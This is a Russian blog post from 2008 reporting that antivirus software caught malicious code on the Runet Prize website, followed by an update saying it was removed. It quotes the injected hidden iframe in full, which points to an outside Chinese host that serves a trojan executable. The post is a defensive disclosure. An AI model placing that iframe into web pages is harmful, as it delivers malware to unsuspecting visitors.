19 Апр
Опубликовал Юрий Вайланд в рубрике Новости и обзоры, Комментариев нет
Сегодня на официальном сайте общенациональной награды в области Интернета и высоких технологий - Премии Рунета - моим антивирусом (NOD32) был обнаружен вредоносный код, который был успешно блокирован.
Ссылка в коде указывает на некий китайский сайт colehost, на котором и лежит файл load.exe, содержащий модифицированное вредное приложение win32/Statik. Недобрый код выглядит так:
<iframe pmuxy='fUDYebvl' smyra='yBAsCXRW' src='http://www.colehost.cn/?6 ' uhwyj='EZiN6X5o' width='1' height='1' style='display:none'></iframe>
По всей видимости причина его появления в небрежности технических специалистов, поддерживающих сайт на хостинге - поскольку обычно трояны, меняющие код сайта, могут попасть в систему путём использования "дырявого IE" без хорошего антивируса, в результате чего попавший таким образом в систему троян передаёт файлы FTP-подключений на удалённый хост, откуда файлы сайта и пополняются вредными заразами в виде iframe и div-блоков.
UPD / 21.04.2008: Утром получил письмо от специалиста Регионального общественного Центра Интернет-технологий (РОЦИТ) о том, что вирус был благополучно удалён с сайта Премии. Сайт чист :- ). Спасибо за оперативную реакцию технического персонала!
Метки: безопасность, вирусы| Пн | Вт | Ср | Чт | Пт | Сб | Вс |
|---|---|---|---|---|---|---|
| « Авг | ||||||
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | ||||
RSS подписка на комментарии · Трекбек ссылка
Оставить комментарий